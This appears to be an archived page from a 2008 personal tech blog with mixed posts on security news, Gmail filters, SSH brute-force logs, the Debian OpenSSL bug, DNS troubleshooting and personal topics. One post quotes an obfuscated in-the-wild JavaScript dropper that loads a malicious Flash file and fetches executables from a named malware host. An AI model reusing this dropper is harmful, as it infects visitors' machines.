vrijdag 30 mei 2008

This is sweet :D

"AuthSight uses your Mac's iSight camera to take snapshots of the nut behind the keyboard whenever an invalid password is entered, either at login or in a screensaver. AuthSight can also (optionally) email photos to you."

Get it here. Thank Zac Bedell.

woensdag 28 mei 2008

Flash: the format everybody loves to hate [at least should]

Prime time for our beloved FLASH player again: a 0-day has been actively exploited the last couple of days, as reported by Security Focus, SANS, Adobe knows not much more ATM. Served as a file with the jpg extention, that is actually a script:

http://www. play0nlnie. com/pcd/topics/ff11us/20080311cPxl31/07.jpg

window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
eval(function(p,a,c,k,e,d){e=function(c){return(ce(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};
if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace
(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('n(2.q.k("i=")==-1){E 5=F D();5.C(5.G()+12*j*j*B);2.q="i=K;J=/;5="+5.I();n(L.y.t().k("s")>0){2.3(\'A="z:u-x-v-w-H" Y="6://15.14.9/13/10/11/17/18.M#1a=4,0,19,0" l="0" m="0"
16="Z">\');2.3(\'<8 7="R" a="Q"/>\');2.3(\'<8 7="P" a="6://g.h.9/e/f/d/b/p.
c"/>\');2.3(\'<8 7="N" a="O"/>\');2.3(\'<8 7="S" a="#T"/>\');2.3(\'\');2.3(\'
\')}W{2.3("")}}',62,73,'||document|write||expires|http|name|param|com|value|
20080311cPxl31|swf|ff11us|pcd|topics|www|play0nlnie|playon|60|indexOf|
width|height|if|src|07|cookie|object|msie|toLowerCase|d27cdb6e|11cf|96b8|ae6d|
userAgent|clsid|classid|1000|setTime|Date|var|new|getTime|444553540000|
toGMTString|path|Yes|navigator|cab|quality|high|movie|sameDomain|allowScriptAccess
|bgcolor|ffffff|08|EMBED|else|embed|codebase|middle|shockwave|cabs||pub|macromedia
|download|align|flash|swflash||version'.split('|'),0,{}))

That in the end, downloads:
http://www. play0nlnie. com/ax.exe
&
http://www. play0nlnie. com/setip.exe

Virustotal was 7/31 for ax.exe, and 7/31 for setip.exe earlier this evening.

Google gives a cool 359 results for the quoted string "Adobe Flash Player SWF File Unspecified Remote Code Execution Vulnerability" so word's out.

dinsdag 27 mei 2008

Arun Sarin is leaving Vodafone

What a pitty!

We lost the most out of touch CEO ever who's ideas, visions and quotes where always mindbending.

donderdag 22 mei 2008

gmail filter multiple domains


For sometime I have been wondering about how to implement my own idea of a zero inbox, and at the same time keep my filters in gmail clean and mean.

It took me a couple of searches to find the answer. It's simple:
You can separate the domains|names with a vertical bar '|' but not with a comma or the 'OR' operator. Well, actually you can use the good old 'OR' clause but then you need to use the '(' and ')' like so:

Matches: from:((@komplett.nl OR @4launch.nl OR @livinstyle.nl OR @marketing.rackspace.co.uk OR @youthink.com OR @sourceforge.net OR @klm-email.com OR @service.swiss.com OR @dienstmakkers.nl OR @amsterdam.nl OR @honestreporting.com OR @ziki.com OR @opendns.com OR @marketing.rackspace.co.uk OR @enews.sierra-news.com OR @rapidshare.com OR @weekly.gamespy.com OR @nts.nl OR @nintendo-europe.com OR @dienstmakkers.nl OR @ajax.nl @komplett.nl OR @bol.com OR @service.swiss.com OR @sans.org OR @videoland.nl OR @sovereignlife.com OR @amsterdam.nl OR @nts.nl OR @20min.ch OR @ringtonio.nl OR @2dehands.nl OR @4launch.nl OR @klm-email.com OR @davinciteam.com OR @mail.expedia.nl OR @looki.de OR @global-conflict.org OR @i3d.net OR @ebay.de OR @db2.myorc.com OR @mashmaker.intel.com OR @xing.com OR @firebrandtraining.co.uk OR @ipswitchmail.com OR @marktplaats.nl))
Do this: Skip Inbox, Apply label "XXX"

Nice. Inbox down to (243) unreads that I acually might read, one day... unless they're caught by my 'sorry, no time' filter that somehow flagged the message by triage as "dead wood".

Photo by Code Poet

maandag 19 mei 2008

Times are changing...


I am from the time that dental correction was only cool when done invisible. You would have your holes plugged, most of the time with 'amagaan' but that was for the poor [me]. The cooler people used plastic in teh colour of their teeth.

Nowadays my kids _die_ for a super visible dental correction. The more 'bling' the better.

A good thing, in my book.

vrijdag 16 mei 2008

SSH brute force botnet

Nice, I must have been a sleep the last couple of days. Since May 11 02:41:53 my logfiles [who never sleep] started logging a more 'advanced' brute force ssh attempts. See this:

May 11 02:41:53 meij sshd[23046]: Failed keyboard-interactive/pam for invalid user tomcat from 168.243.236.228 port 56131 ssh2
May 11 04:36:27 meij sshd[23490]: Failed keyboard-interactive/pam for invalid user tsc from 190.12.74.11 port 57240 ssh2
May 11 07:07:29 meij sshd[24482]: Failed keyboard-interactive/pam for invalid user chang from 66.159.198.155 port 51730 ssh2
May 11 19:41:47 meij sshd[27408]: Failed keyboard-interactive/pam for invalid user backup from 196.211.44.154 port 12491 ssh2
May 11 19:42:58 meij sshd[27411]: Failed keyboard-interactive/pam for invalid user backup from 193.224.140.35 port 57552 ssh2
May 11 21:09:33 meij sshd[27738]: Failed keyboard-interactive/pam for invalid user postgres from 66.159.198.155 port 59462 ssh2
May 12 01:37:24 meij sshd[29026]: Failed keyboard-interactive/pam for invalid user thomas from 193.224.140.35 port 57325 ssh2
May 12 02:40:33 meij sshd[29258]: Failed keyboard-interactive/pam for invalid user franky from 66.193.161.130 port 49501 ssh2
May 12 03:20:11 meij sshd[29421]: Failed keyboard-interactive/pam for invalid user majordomo from 66.159.198.155 port 49959 ssh2
May 12 03:40:57 meij sshd[29482]: Failed keyboard-interactive/pam for invalid user shop from 212.24.179.54 port 42187 ssh2
May 12 03:58:24 meij sshd[29541]: Failed keyboard-interactive/pam for invalid user thisuserdoesnotexists from 88.191.50.77 port 58021 ssh2
[... snip ...]
May 14 01:35:26 meij sshd[14831]: Failed keyboard-interactive/pam for invalid user orant from 66.162.98.185 port 45112 ssh2
May 14 01:41:32 meij sshd[14846]: Failed keyboard-interactive/pam for invalid user appen from 66.122.59.6 port 47129 ssh2
May 14 01:56:11 meij sshd[14904]: Failed keyboard-interactive/pam for invalid user bohmbach from 74.238.169.202 port 39950 ssh2
May 14 02:00:10 meij sshd[14947]: Failed keyboard-interactive/pam for invalid user braun from 72.254.69.226 port 2861 ssh2
May 14 02:03:16 meij sshd[14973]: Failed keyboard-interactive/pam for invalid user buesing from 211.232.103.213 port 29070 ssh2
May 14 02:04:40 meij sshd[14976]: Failed keyboard-interactive/pam for invalid user conrad from 213.134.152.66 port 3523 ssh2
May 14 02:08:27 meij sshd[14989]: Failed keyboard-interactive/pam for invalid user dregenus from 194.94.205.135 port 49358 ssh2
May 14 02:09:29 meij sshd[14992]: Failed keyboard-interactive/pam for invalid user duelsen from 85.207.127.98 port 44080 ssh2
May 14 02:14:26 meij sshd[15006]: Failed keyboard-interactive/pam for invalid user fellechn from 213.134.152.66 port 1294 ssh2
May 14 02:15:54 meij sshd[15033]: Failed keyboard-interactive/pam for invalid user fellechn from 74.238.205.245 port 47536 ssh2
May 14 02:17:27 meij sshd[15036]: Failed keyboard-interactive/pam for invalid user friebe from 69.15.172.22 port 2162 ssh2
May 14 02:20:52 meij sshd[15048]: Failed keyboard-interactive/pam for invalid user friese from 62.2.211.46 port 28917 ssh2
May 14 02:22:13 meij sshd[15051]: Failed keyboard-interactive/pam for invalid user fuhrhop from 217.7.233.155 port 58495 ssh2
May 14 02:24:51 meij sshd[15063]: Failed keyboard-interactive/pam for invalid user geffers from 64.73.250.213 port 45064 ssh2
May 14 02:26:40 meij sshd[15066]: Failed keyboard-interactive/pam for invalid user geffers from 221.8.255.134 port 42398 ssh2
[end.]

1209 attempts for 654 "invalid users" in 49 busy hours from [
grep "invalid user" /var/log/messages | awk -F" " '{ print $13 }' | sort | uniq -u | wc] 53 unique addresses. Not bad. Slipped below my denyhosts radar just nicely.

donderdag 15 mei 2008

Kampioen EK2008: Rusland

Today is speculation day :D

Zwitserland - Tsjechie 2 - 1
Roemenie - Frankrijk 0 - 2
Portugal - Turkije 1 - 1
Nederland - Italie 3 - 2
Tsjechie - Portugal 2 - 1
Italie - Roemenie 2 - 1
Zwitserland - Turkije 3 - 2
Nederland - Frankrijk 0 - 2
Zwitserland - Portugal 1 - 2
Nederland - Roemenie 2 - 1
Turkije - Tsjechie 0 - 0
Frankrijk - Italie 1 - 2

Oostenrijk - Kroatie 1 - 1
Spanje - Rusland 1 - 2
Duitsland - Polen 1 - 0
Griekenland - Zweden 1 - 3
Kroatie - Duitsland 1 - 2
Zweden - Spanje 0 - 2
Oostenrijk - Polen 3 - 1
Griekenland - Rusland 1 - 2
Polen - Kroatie 1 - 1
Griekenland - Spanje 0 - 2
Oostenrijk - Duitsland 3 - 4
Rusland - Zweden 2 - 1


Zwitserland - Oostenrijk 3 - 1
Duitsland - Tsjechie 2 - 0

Frankrijk - Spanje 3 - 1
Rusland - Italie 2 - 1


Zwitserland - Duitsland 3 - 1
Spanje - Rusland 0 - 1

Zwitserland - Rusland 2 - 3

Kampioen EK2008: Rusland

Speculation SSL Ubuntu & Thawte

Hmm, considering the fact that Mark Schuttleworth is the founder of both Thawte and Ubuntu...

And Ubuntu is Debian based

And Debian's SSL suffers from a giant randomness issue

And www.thawte.com runs on Ubuntu

And Ubuntu is a large Certificate Authority

Does that insinuate all Thawte certificates are ready for a review? :P

A great day for scripters!

Last months have been good for the security market. SPAM rose [it has been since 30 years but who is counting?], BOTNETS grew, CC snooping went bigger and the list was nicely added with two, well, astounding issues within the last 24 hours.

First we have a crypto nub who decides to remove basically all randomness [the seed used for PRNG (Pseudo Random Number Generator) used when creating SSL keys] from SSL in Debian. That did not happen last week, nor last month, not even last year, but on Tue May 2 16:34:53 2006 UTC. For reasons that have been mentioned over and over again, not security people should not, repeat NOT fiddle with security issues. Specially not packagers who just want things to install cleanly and silently. That bad.

In this case an unnamed individual did not like what he saw as uninitialized data, he removed one line:
MD_Update(&m,buf,j);
That was enough to make ALL SLL certificates [and thus too the SSH keys that are based on SSL] generated on these systems a randomness that is limited to 32.768 options [all possible PID's on UNIX... That sounds a lot to humans, to computers that is nothing and to crypto it is fcuk all. It is so small that all possible keys have been generated in about two hours for the 1024-bit DSA and 2048-bit RSA keys for x86. HD Moore used 31 Xeon cores clocked at 2.33Ghz to do this.

Luckily for the researchers, HD Moore of metasploit moved quickly and created the OpenSSL Debian toolset WITHIN 24 HOURS[!!!] to toy with the issue.

Thank you. Scripters of the world: unite and have a ball!

To bring the issues a little closer to your mom & pop [who hardly depend on SSH], Aviv Raff decided to post a real nice and nifty 0-day for IE. Scripters of the world, you know what to do.

This is a particular nasty one, not just because it affects about 60% of all browsers in the world but also because our friends in Redmond just pushed out their monthly 'updates' so it will take at least another month before a patch is available, let alone the time it takes for mom & pop to actually update their IE.

So life is good, money there is to be made for us security people. Or is it?

woensdag 14 mei 2008

Beta testers wanted for FERRET

Last October David Maynor went to the the NASCAR truck series. Of course he brought his iPhone with and was shocked to see so many open WiFi networks:


So what do you do when you made the headlines with your Ferret & Hamster releases in August 2007? You port Ferret [hamster too? Maybe? Please?] to the iPhone.

Now they are looking for beta testers with open iPhones. Feel up to the challenge?

Check here!

Happy Birthday Ha'Aretz!



Never will I forget how we met, how the initial moments where, how deeply I was moved by you and how a profound impact you made on me and my live.

It was a coincidence, no really, it was. It was not as if my live was aimed at that particular event, not that was I was brought up to come to you, not that I had any known desire to experience you. It was purely coincidental that we met. Or was it? Was it not so that in my family your name was uttered in soft words of the highest respect? Was it not so that the 'coded' words my grant parents & parents whispered to each other, hidden for us kids, when saying goodby, where words that ended with something like '...Jerusalem'?

It does not matter. Fact is, that on December the 27th, in the year 1989 you welcomed me. Fact is that ever since that day there is no place on earth that has touched me deeper, felt better, shines brighter then you.

Happy birthday, state of Israel. May you and your inhabitants live, prosper & find the peace and integrity you deserve.

vrijdag 9 mei 2008

Maths is the music of reason




musician wakes from a terrible nightmare. In his dream he finds himself in a society where music education has been made mandatory. “We are helping our students become more competitive in an increasingly sound-filled world.” Educators, school systems, and the state are put in charge of this vital project. Studies are commissioned, committees are formed, and
decisions are made— all without the advice or participation of a single working musician or composer.
Since musicians are known to set down their ideas in the form of sheet music, these curious black dots and lines must constitute the “language of music.” It is imperative that students become fluent in this language if they are to attain any degree of musical competence; indeed, it
would be ludicrous to expect a child to sing a song or play an instrument without having a thorough grounding in music notation and theory. Playing and listening to music, let alone composing an original piece, are considered very advanced topics and are generally put off until college, and more often graduate school.

As for the primary and secondary schools, their mission is to train students to use this language— to jiggle symbols around according to a fixed set of rules: “Music class is where we take out our staff paper, our teacher puts some notes on the board, and we copy them or transpose them into a different key. We have to make sure to get the clefs and key signatures right, and our teacher is very picky about making sure we fill in our quarter-notes completely. One time we had a chromatic scale problem and I did it right, but the teacher gave me no credit because I had the stems pointing the wrong way.”

In their wisdom, educators soon realize that even very young children can be given this kind of musical instruction. In fact it is considered quite shameful if one’s third-grader hasn’t completely memorized his circle of fifths. “I’ll have to get my son a music tutor. He simply won’t apply himself to his music homework. He says it’s boring. He just sits there staring out the window, humming tunes to himself and making up silly songs.”

In the higher grades the pressure is really on. After all, the students must be prepared for the standardized tests and college admissions exams. Students must take courses in Scales and Modes, Meter, Harmony, and Counterpoint. “It’s a lot for them to learn, but later in college when they finally get to hear all this stuff, they’ll really appreciate all the work they did in high school.” Of course, not many students actually go on to concentrate in music, so only a few will ever get to hear the sounds that the black dots represent. Nevertheless, it is important that every member of society be able to recognize a modulation or a fugal passage, regardless of the fact that they will never hear one. “To tell you the truth, most students just aren’t very good at music.

They are bored in class, their skills are terrible, and their homework is barely legible. Most of them couldn’t care less about how important music is in today’s world; they just want to take the minimum number of music courses and be done with it. I guess there are just music people and non-music people. I had this one kid, though, man was she sensational! Her sheets were impeccable— every note in the right place, perfect calligraphy, sharps, flats, just beautiful. She’s going to make one hell of a musician someday.”


Waking up in a cold sweat, the musician realizes, gratefully, that it was all just
a crazy dream. “Of course!” he reassures himself, “No society would ever reduce such a beautiful and meaningful art form to something so mindless and trivial; no culture could be so cruel to its children as to deprive them of such a natural, satisfying means of human expression. How
absurd!”

Meanwhile, on the other side of town, a painter has just awakened from a similar
nightmare…

***********
And all this leads us into a wonderful written essay on how we are messing up the love and purity of math for our kids. Written by Paul Lockhart [and NO, that is NOT the space invader Paul Lockhart], an assistant professor at Brown Brown who left to teach a mathematician's point of view to very young children. In his own words, "I want them to understand that there is a playground in their minds and that that is where mathematics happens. So far I have met with tremendous enthusiasm among the parents and kids, less so among the mid-level administrators." Is that so :P

BTW If anybody speaks to Paul, can you please ask him to start blogging or publishing more in any other way shape or form?

An eye opener and good read to boot. Enjoy it!

donderdag 8 mei 2008

HELP: Linkedin removed my profile! [well, not mine, really]

What gives? A colleague of mine ran into my office and asked me to check Linkedin to see if I could find his profile. We are connected so, sure, I checked my connections. Since I am known to make a spelling error or two, specially with names, I was not convinced that something was wrong when I did not find him in my connections list.



So I used Google, who loves LinkedIn profiles, to see if I got his name correct: I did.







As a matter of fact, Google nicely cached his profile page on LinkedIn. CCIE # et all. So for sure he nor me is not nuts and he did have a LinkedIn profile and we are connected. Something must be wrong with my seach on LinkedIn, right?

Let's copy & paste that name, and CCIE serial, and repeat the search.


No matter what we tried, all we found was this "Dell sales dude" but never the hardcore network'er that stood behind me, I had linked to, and Google had cached.






So I tried some Google-fu to see if more people had their profile removed by LinkedIn, but all I found was people who asked for them selfs to be removed and happy faces that LinkedIn finally let's you remove links to people you once linked to. Silently, to make sure you piss nobody off :P

This is an interesting issue however.

I always check peoples LinkedIn profiles when I do job interviews or have business meetings planned with people I do not know. It often helps to make sure you use the correct wording [or metaphor's when clueless] when you know a little bit about their [public] background. I know many future employers do the same [Hi guys! I see you browse my profile before you call :D].

But what happens if you can't find that potential new employee on LinkedIn and you know nothing about her|him? Will it influence your initial selection on who to talk to and who not? I am sure it does for lots of companies. Never mind how smart that is, but it is done.

So what do you do when you drop of the most valuable professional showroom of the net? How does one prevent that from happening and having a too big an impact on your money making abilities?

woensdag 7 mei 2008

Imagion being Vodafony and bending over Apple...

What do you get after you've been initially big mouthing Steve at the launch of the iPhone, claiming you know it all for you have been in the GSM cloud business so long?

You get the left overs, the 2G countries, like: Australia, the Czech Republic, Egypt, Greece, Italy, India, Portugal, New Zealand, South Africa and Turkey. And those you get not even exclusively, muwaa!!!

Being able to offload 2G handsets into secondary markets will be very useful for Apple if they do launch a 3G version of the iPhone as generally expected.

Now, Arun Sarin has been labeled strange and basically clueless before. Being out of touch with reality really scares the shiit out of people working in his company but who know, now that he found the way in to Apple's $ stream, maybe the good people working at Vodafone will get a break and develop something nice. Maybe. Then again it is more likely the big shot sees no need for cool iPhone apps and will be happy with the pennies and cents he is allowed to keep for the devices he sells, business like usual.

dinsdag 6 mei 2008

opendns resolve issue? no, it's squid.

For reasons only known to my shrink, I wanted Firefox to use a tunnel from a Windows XP machine to a OpenSuse linux host resolving via OpenDNS and squid to make things complete.

Funny stuff, that I do just because I can.

It is all really easy to get it up and running, nice to have your own tools on a sticky and funnel your wild browsing behavior encrypted to a known end point where you set it free into the world wild web. But trust is good, a functional test is better, but checking is better, as my audit teacher taught me. So the first thing I did was monitoring for data leakage on my local [windows host's] interface: nada. Schade.

Then I went to the remote's host interface to see what showed there: horor, nice! What I saw was part of the resolve queries going to my old and reliable [and we all hate reliable, right?] colocate DNS and part of the queries to OpenDNS. Hmm, makes you wonder. So checking the resolve file showed that I had correctly added the two opendns entries, and correctly removed the entries passed to the file via DHCP. I flushed the DNS cache, still no joy. Hmm, makes you wonder. Turned out it was squid not nicely obeying the new entries in the resolver file. Naughty squid!

My setup in more detail:

Firefox [2.0.14 on winXP SP2] well, actually it is FireFoxPortable on a 16Gb Flash Voyager.
putty [version 0.60] for a tunnel to an external host, listening on 127.0.0.1:8888, talking to 127.0.0.1:3128 where squid [Version 2.5.STABLE10] on Suse [2.6.13-15.18 i386]

I have added a boolean option into the URL "about:config" page in Firefox named "network.proxy.socks_remote_dns" and set it to true.

The resolver file on the remote host contains:
cat /etc/resolve
### BEGIN INFO

#
# Modified_by: dhcpcd
# Backup: /etc/resolv.conf.saved.by.dhcpcd.eth0

# Process: dhcpcd
# Process_id: 4326
# Script: /sbin/modify_resolvconf

# Saveto:
# Info: This is a temporary resolv.conf created by service dhcpcd.

# The previous file has been saved and will be restored later.
# # If you don't like your resolv.conf to be changed, you
# can set MODIFY_{RESOLV,NAMED}_CONF_DYNAMICALLY=no. This # variables are placed in /etc/sysconfig/network/config.
# # You can also configure service dhcpcd not to modify it.
# # If you don't like dhcpcd to change your nameserver # settings
# then either set DHCLIENT_MODIFY_RESOLV_CONF=no
# in /etc/sysconfig/network/dhcp, or
# set MODIFY_RESOLV_CONF_DYNAMICALLY=no in
# /etc/sysconfig/network/config or (manually) use dhcpcd

# with -R. If you only want to keep your searchlist, set
# DHCLIENT_KEEP_SEARCHLIST=yes in /etc/sysconfig/network/dhcp or

# (manually) use the -K option.
# ### END INFO
nameserver 208.67.222.222

nameserver 208.67.220.220

And yes, I have set both options to 'no'

To clear the dns 'cache' I used:
/etc/init.d/nscd restart

What puzzled me is the following output when I use my local browser [that tunnels it's requests to the remote host] and monitor the DNS queries on the remote host's interface [the remote host being my-host.xxx, my provider's dns server being lookup2.colo.xxx]:

tcpdump -p -i eth0 port 53

15:52:19.525862 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 28225+ A? mokumvonamsterdam.blogspot.com. (48)
15:52:19.526356 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 28417+ PTR? 188.250.202.213.in-addr.arpa. (46)
15:52:19.542138 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 28225 2/7/7[|domain]
15:52:19.739094 IP resolver1.opendns.com.domain > my-host.xxx.39176: 28417 1/0/0 (75)
15:52:19.739459 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 17259+ PTR? 81.240.202.213.in-addr.arpa. (45)
15:52:19.949697 IP resolver1.opendns.com.domain > my-host.xxx.39176: 17259 1/0/0 (67)
15:52:19.950334 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 48705+ PTR? 222.222.67.208.in-addr.arpa. (45)
15:52:19.973525 IP resolver1.opendns.com.domain > my-host.xxx.39176: 48705 1/0/0 (80)
15:52:20.698247 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 63234+ A? www.blogger.com. (33)
15:52:21.028751 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 63234 2/7/7[|domain]
15:52:23.133656 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 57393+ A? www.youtube.com. (33)
15:52:23.134089 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 57393 3/3/3 A youtube.com,[|domain]
15:52:23.134563 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 51875+ PTR? 253.153.65.208.in-addr.arpa. (45)
15:52:23.157911 IP resolver1.opendns.com.domain > my-host.xxx.39176: 51875 1/0/0 (70)
15:52:24.315674 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 48709+ A? twitter.com. (29)
15:52:24.502987 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 48709 1/5/5 A[|domain]
15:52:25.981131 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 25981+ A? www.google.com. (32)
15:52:25.981560 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 25981 5/7/7 CNAME www.l.google.com.,[|domain]
15:52:28.057148 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 20445+ A? www.google-analytics.com. (42)
15:52:28.057758 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 20445 5/7/7 CNAME[|domain]
15:52:29.280144 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 59181+ A? toolbarqueries.google.com. (43)
15:52:29.408904 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 59181 5/7/7[|domain]

Turned out that I had to restart squid [/etc/init.d/squid restart] to make the resolving act nicely and forward _all_ lookups to opendns.com

16:12:04.543848 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 8407+ A? mokumvonamsterdam.blogspot.com. (48)
16:12:04.567414 IP resolver1.opendns.com.domain > my-host.xxx.39176: 8407 2/0/0[|domain]
16:12:05.282740 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 58294+ A? www.blogger.com. (33)
16:12:05.306651 IP resolver1.opendns.com.domain > my-host.xxx.39176: 58294 2/0/0 CNAME[|domain]
16:12:08.624282 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 59333+ A? central.ujcfedweb.org. (39)
16:12:08.843032 IP resolver1.opendns.com.domain > my-host.xxx.39176: 59333 2/0/0 CNAME[|domain]
16:12:10.189203 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 58807+ A? twitter.com. (29)
16:12:10.212537 IP resolver1.opendns.com.domain > my-host.xxx.39176: 58807 1/0/0 A 128.121.146.100 (45)
16:12:10.213033 IP my-host.xxx.39177 > resolver1.opendns.com.domain: 18146+ PTR? 100.146.121.128.in-addr.arpa. (46)
16:12:10.236480 IP resolver1.opendns.com.domain > my-host.xxx.39177: 18146 NXDomain 0/0/0 (46)
16:12:12.703541 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 11197+ A? www.google.com. (32)
16:12:12.727000 IP resolver1.opendns.com.domain > my-host.xxx.39176: 11197 3/0/0 CNAME[|domain]
16:12:13.629888 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 24465+ A? www.justsayhi.com. (35)
16:12:13.738147 IP resolver1.opendns.com.domain > my-host.xxx.39176: 24465 1/0/0 A 4.78.241.72 (51)
16:12:13.738702 IP my-host.xxx.39177 > resolver1.opendns.com.domain: 42572+ PTR? 72.241.78.4.in-addr.arpa. (42)
16:12:14.273047 IP resolver1.opendns.com.domain > my-host.xxx.39177: 42572 NXDomain 1/0/0 CNAME[|domain]
16:12:15.706642 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 54172+ A? www.google-analytics.com. (42)
16:12:15.730274 IP resolver1.opendns.com.domain > my-host.xxx.39176: 54172 5/0/0 CNAME[|domain]
16:12:18.673145 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 40629+ A? toolbarqueries.google.com. (43)
16:12:18.696662 IP resolver1.opendns.com.domain > my-host.xxx.39176: 40629 5/0/0[|domain]


Hope this helps someone trying to use opendns.com too.

vrijdag 2 mei 2008

Google ad's my Inbox(1) !!!


Here is a nice variation on misleading google ad's: claiming your Inbox has (1) unread email, smart move [thanks to Twitter, Twinkle & Jeroen Mirck for making this possible :P ].


I liked the people who used the ASCII adds last year, I do, I am inn the market for funny ads that make me wonder, think or just laugh.
Unfortunatly, ASCII art ad's are over since Google altered the 'puncuation' rule.

donderdag 1 mei 2008

Maltego v2 - is ready!


Oh boy I am so exited!

Get it at: http://www.paterva.com/maltego/

All,

After 15 months of work Maltego version 2.0 is ready. It's been a long and interesting road. Many of you have seen the product grow from beta 1 to beta 2, then KZ3 and JS1. I've shared with you the challenges, the ups and downs. Finally, today, I am happy to release version 2.0.
Version 2.0 is commercial and I feel it's got the right be commercial because it's by far the coolest and most useful application I've ever used (OK so perhaps I am just slightly biased). As I've mentioned before - it goes live to this list first. Everything is set up, but not linked to the main site. I will link it on Monday.

Also - as promised - a list of new features/improvements:

* Load/Save of entire graphs means you can always go back to your investigation.
* Printing of graphs (over multiple pages)
* Export of entities (CSV format) makes it easy to import Maltego data into other databases.
* Commercial grade layout library:
o The layout and navigation have been optimized for speed and usability.
o Four layout types to rearrange data the way YOU want it.
o Two view types for finding relevant info on large graphs.
* More entities and 20 brand new transforms for even deeper searches and more information.
* Search/Find (on entity value, detailed info and additional fields) helps you to get to key nodes quicker.
* Multiple open graphs on different tabs for easy switching between graphs.
* Dedicated clear-all, zoom buttons for notebook users.
* Hollywood quality look & feel will impress your friends and your boss.
* Integrated help on transforms and entities to increase your learning curve.
* Complete user guide ensures you are never lost.
* Prepopulated and preconfigured transforms and transform sets saves you time.
* Population of API key integrated with license key so it’s never lost.
* Platform independent installer means you can install it anywhere.

If you want to see what it looks like before making a commitment you should look at the user guide and the screen shots. You should also read the system requirements.

The documentation can be found at http://ctas.paterva.com/wiki

Enjoy responsibly,
Roelof.